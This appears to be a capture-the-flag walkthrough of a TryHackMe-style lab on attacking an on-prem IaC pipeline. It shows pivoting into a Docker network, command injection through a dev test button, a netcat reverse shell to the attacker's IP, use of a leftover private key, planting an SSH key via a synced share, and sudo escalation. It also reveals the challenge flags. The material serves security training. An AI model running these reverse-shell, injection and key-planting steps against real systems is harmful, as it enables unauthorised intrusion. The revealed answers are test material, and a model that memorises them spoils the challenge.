IaC Challenge
Now that you have learned how on-prem IaC deployments work and the security concerns that arise when using IaC, it's time to put that knowledge to the test.
In order for us to provide you with this challenge, a significant amount of software had to be kept at specific version levels. As such, the machine itself has some outdated software, which could be used with kernel exploits to bypass the challenge itself. However, if you choose the route of kernel exploitation to bypass the challenge and recover the flags, it will only hurt your own learning opportunity. Our suggestion: try to solve the challenge by using what you have learned in this room about on-prem IaC.
Once the machine is booted, you can use SSH with the credentials below to connect to the machine:
Username: entry
Password: entry
IP: 10.10.64.200
Once authenticated, you will find the scripts for an IaC pipeline. Work through these files to identify vulnerabilities and attack the machines deployed by the IaC pipeline to ultimately gain full control of the pipeline! You can also use this SSH connection to "catch shells" as required. You will have to combine these files with what you learned in Building an On-Prem IaC Workflow to compromise the pipeline!
To assist you on this journey, you can make use of the hints provided below. However, since the main goal is attacking an IaC pipeline, you are provided with the following:
Nmap has been installed for you on the host, allowing you to scan the port range of the Docker network if required.
Use SSH to proxy out the traffic of the web application, or any other port, as required.
You can use the SCP command of SSH to transfer out the IaC configuration files.
IP: 10.10.64.200
Let’s ping the machine to see if we’ve connected successfully.
ping -c3 10.10.64.200
Let’s now connect to the machine via SSH.
ssh entry@10.10.64.200
Let’s now switch to a more stable bash shell.
bash
When we list the files, we see a folder named “iac” containing multiple configuration files.
ls -la
Let’s now check the Vagrantfile.
cat Vagrantfile
Vagrant.configure("2") do |config|
  # DB server will be the backend for our website
  config.vm.define "dbserver" do |cfg|
    # Configure the local network for the server
    cfg.vm.network :private_network, type: "dhcp", docker_network__internal: true
    cfg.vm.network :private_network, ip: "172.20.128.3", netmask: "24"
    # Boot the Docker container and run Ansible
    cfg.vm.provider "docker" do |d|
      d.image = "mysql_vuln"
      d.env = {
        "MYSQL_ROOT_PASSWORD" => "mysecretpasswd"
      }
    end
  end
  # Webserver will be used to host our website
  config.vm.define "webserver" do |cfg|
    # Configure the local network for the server
    cfg.vm.network :private_network, type: "dhcp", docker_network__internal: true
    cfg.vm.network :private_network, ip: "172.20.128.2", netmask: "24"
    # Link the shared folder with the hypervisor to allow data passthrough. Will remove later to harden
    cfg.vm.synced_folder "./provision", "/tmp/provision"
    cfg.vm.synced_folder "/home/ubuntu/", "/tmp/datacopy"
    # Boot the Docker container and run Ansible
    cfg.vm.provider "docker" do |d|
      d.image = "ansible"
      #d.cmd = ["ansible-playbook", "/tmp/provision/web-playbook.yml"]
      d.has_ssh = true
      # Command will keep the container active
      d.cmd = ["/usr/sbin/sshd", "-D"]
    end
    # We will connect using SSH so override the defaults here
    cfg.ssh.username = 'root'
    cfg.ssh.private_key_path = "/home/ubuntu/iac/keys/id_rsa"
    # Provision this machine using Ansible
    cfg.vm.provision "shell", inline: "ansible-playbook /tmp/provision/web-playbook.yml"
  end
end
So in the file we can see that there are two VMs. The first, dbserver, is the backend for our website, so we know it’s running MySQL, and we have its IP as well: 172.20.128.3. The second is the webserver, which has the IP 172.20.128.2. Both sit on an internal Docker network, so we cannot reach or ping them directly from our own machine.
But if we curl the internal machine from our SSH session, we get a response.
curl http://172.20.128.2/
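The hints note that nmap is installed on the host for scanning the Docker subnet. As a lightweight alternative (a sketch assuming only bash on the host), bash’s /dev/tcp pseudo-device can probe individual ports:

```shell
# Minimal bash-only port probe (no nmap needed): /dev/tcp opens a TCP
# connection; success (exit 0) means the port is open. timeout keeps it fast.
probe() { timeout 1 bash -c "echo > /dev/tcp/$1/$2" 2>/dev/null; }
probe 172.20.128.2 80 && echo "80 open" || echo "80 closed"
```

Looping `probe` over ports 1-1024 gives a crude but serviceable scan when nmap is not available.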
Now we need to pivot into the internal network. There are multiple ways to do this, for example SSH port forwarding as the room suggests, but we’ll be using Ligolo-ng, which in my opinion is the best pivoting tool available.
So let’s start with setting up the ligolo server
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
Now we’ll use the -selfcert option so that the proxy server generates and uses a self-signed certificate.
./proxy -selfcert
Now let’s set up a python server and transfer the agent file to the SSH machine.
python3 -m http.server 80
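Before pulling files from the target, it’s worth confirming the transfer server actually answers (a quick local sanity check; port 8031 here is arbitrary, whereas the walkthrough serves on port 80):

```shell
# Start a throwaway HTTP server in the background, confirm it answers,
# then shut it down. A 200 means the directory listing is being served.
python3 -m http.server 8031 --bind 127.0.0.1 >/dev/null 2>&1 &
SRV_PID=$!
sleep 1
CODE=$(curl -s -o /dev/null -w '%{http_code}' http://127.0.0.1:8031/)
kill "$SRV_PID" 2>/dev/null
echo "HTTP $CODE"
```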
Now, on the target, we move to the /tmp directory, since we have write permissions there, and download our agent file.
cd /tmp
wget http://10.17.77.69/agent
Now let’s change the permission of the agent file and execute it.
chmod +x agent
./agent -connect 10.17.77.69:11601 -ignore-cert
Now if we check our proxy we can see that we got our connection there.
Now, by running ifconfig on the target, we can see all of its network interfaces.
Let’s note the internal subnet and add a route for it through the ligolo interface so that we can reach it from our Kali machine as well.
sudo ip route add 172.20.128.0/24 dev ligolo
Now we can start the tunnel on the proxy: in the Ligolo-ng console, run session, select our agent, and then run start.
Now if we visit the webserver from our browser we can see that we’re able to see the webpage.
Now let’s start Caido so we can proxy some of these requests.
caido
Now let’s refresh the page and check whether we can intercept the request in Caido. And yes, we’re able to capture the requests.
Now, on the Sign In page, we see a button labeled (Dev) Test DB. Clicking it shows us the MySQL version, so let’s look at the request and response in Caido. We can see that it executes a command, so let’s try executing different commands ourselves.
While testing the whoami command, we see that it returns a 200 OK status code, which means we can execute commands. Looking at the rendered response, we can see that we’re executing commands as the root user.
Now let’s try to get a reverse shell from the machine.
which nc
Netcat is present on the target, so we can use it to catch a shell.
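Before committing to a payload, it can help to enumerate which helper binaries exist on the target (the list of binaries below is illustrative, not exhaustive):

```shell
# Check which common reverse-shell helpers are on PATH.
FOUND=""
for bin in nc ncat socat python3 bash; do
  command -v "$bin" >/dev/null 2>&1 && FOUND="$FOUND $bin"
done
echo "available:$FOUND"
```

Whichever of these is present dictates the payload: nc with -e support, a socat shell, or a python/bash /dev/tcp one-liner.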
On our SSH shell we can start netcat.
nc -nvlp 1337
Now, moving back to Caido, we inject the reverse-shell command:
/bin/nc 10.10.205.253 1337 -e /bin/bash
Now let’s check our Netcat listener. Listing the files, we can see our first flag.
ls -la
Flag: THM{Dev.Bypasses.and.Checks.can.be.Dangerous}
When a Vagrant deployment is performed, by default, Vagrant will create a local copy of the provisioning directory under the /vagrant/ folder. Have a look at that and see if some sensitive information may have been left there.
We have a hint here that says to check the /vagrant folder, so let’s see if we can find something to use.
cd /vagrant
The keys folder looks promising. It contains the id_rsa private key, so let’s transfer it to our Kali machine (the room suggests scp for this) and try to SSH into the webserver.
chmod 600 id_rsa
Now let’s SSH into the webserver.
ssh root@172.20.128.2 -i id_rsa
And as we can see, we’re logged in as root on the webserver.
ls -la
And we got our 2nd flag as well here.
Flag: THM{IaC.Deployment.Keys.Must.be.Removed}
Oftentimes we need to transfer large amounts of data when deploying through an IaC pipeline. If we are a bit lazy, we might not restrict our shares or revoke them once we are done. Have a look at the provisioning shares.
Now we have another hint, which means there must be a folder or share that we have access to, with the provisioning shares specifically highlighted.
Now, if we look in the /tmp directory, we see a folder named datacopy, which must be the share the hint is talking about.
Listing all the files in the datacopy folder, we find our 3rd flag.
Flag: THM{IaC.Shares.Should.be.Restricted}
To perform provisioning in an IaC pipeline you need quite a bit of privileges. Often it is hard to determine exactly what privileges are needed, resulting in the permissions being too permissive.
We now have another hint. We cannot escalate to root as the entry user. Looking back, however, there is another user named ubuntu, which likely holds the privileged access used for provisioning.
From our root shell on the webserver, we can see all of the ubuntu user’s files, since /tmp/datacopy is a shared folder mapped to /home/ubuntu on the host. So if we can somehow gain access as ubuntu, our work is done.
Running ls -la, we find a folder named .ssh, so if we place our own SSH public key in it, we can probably escalate our privileges.
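If you don’t already have a keypair on your attacking machine, you can generate one first (the filename thm_key is just an example):

```shell
# Generate a fresh RSA keypair with no passphrase; thm_key.pub is the part
# we will append to the target's authorized_keys file.
ssh-keygen -t rsa -b 3072 -f ./thm_key -N "" -q
ls -l thm_key thm_key.pub
```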
ls -la
So we have our public key ready; now let’s append it to the authorized_keys file. Since the share maps to ubuntu’s home directory on the host, writing to .ssh/authorized_keys here effectively adds our key for the ubuntu user.
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCOI7BWKSZ4O6qBeC72lsjnz1TRwHyhh7A3Jvk6RC2830NsBIRhHsPROlVNnmMcgCyYhxNH1W4I5P2B2e165MNQbS/CzCNUSZojN3/sqwNJmRP9xGW0nzy9vO7Luypn1tNDibNA4NmbRlVfXNdIfk7OqjYAnWVJ42AZmqhNRgnjM4czpeRylp0vFDj2jaxYvf5muhE92FUEAbXD4CT6tNrfmGJlExH1PhOljg0AF5idLykhZfnY0Bdh7g6eo4LNtyqRGycH5w/bsqmbsuT1TuMa74xIRkjZHsoUMLuBfpC2+DUbLjXTguAvT8h+8coDmECTNjivkp5DnJRFh04sB9uIxgxb10UjqJL1kB+NyP8IYhYcVub4suAFdlBX/NtCZZvdFYDokc1KrHzJv/Zs0KWTkfOGL3KM4EpOYXe5RQ8EMidighMMDQckx7S5ZbYQ8423Dj3WJedLjoqmpyLdedUyR3CbiELe1CH2Ov1OUJ34vNZ268R4zTdKdULRA87pnq8= kali@kali" >> authorized_keys
Make sure to use “>>” so that we append to the file instead of overwriting it.
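The difference matters, as a quick demonstration of “>” (truncate) versus “>>” (append) on a scratch file shows:

```shell
# '>' truncates the file; '>>' appends, preserving any existing keys.
echo "existing-key" >  demo_authorized_keys
echo "our-new-key"  >> demo_authorized_keys
cat demo_authorized_keys
```

Had we used “>” for our key, any keys already present for ubuntu would have been destroyed, which is both noisy and destructive.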
cat authorized_keys
Now let’s SSH into the machine as the ubuntu user.
ssh ubuntu@10.10.205.253
And we’re logged in. Now let’s check our sudo permissions.
sudo -l
We can run sudo without a password, so let’s switch to the root user.
sudo su
Now, checking the /root folder, we find our final flag.
Flag: THM{Provisioners.Usually.Have.Privileged.Access}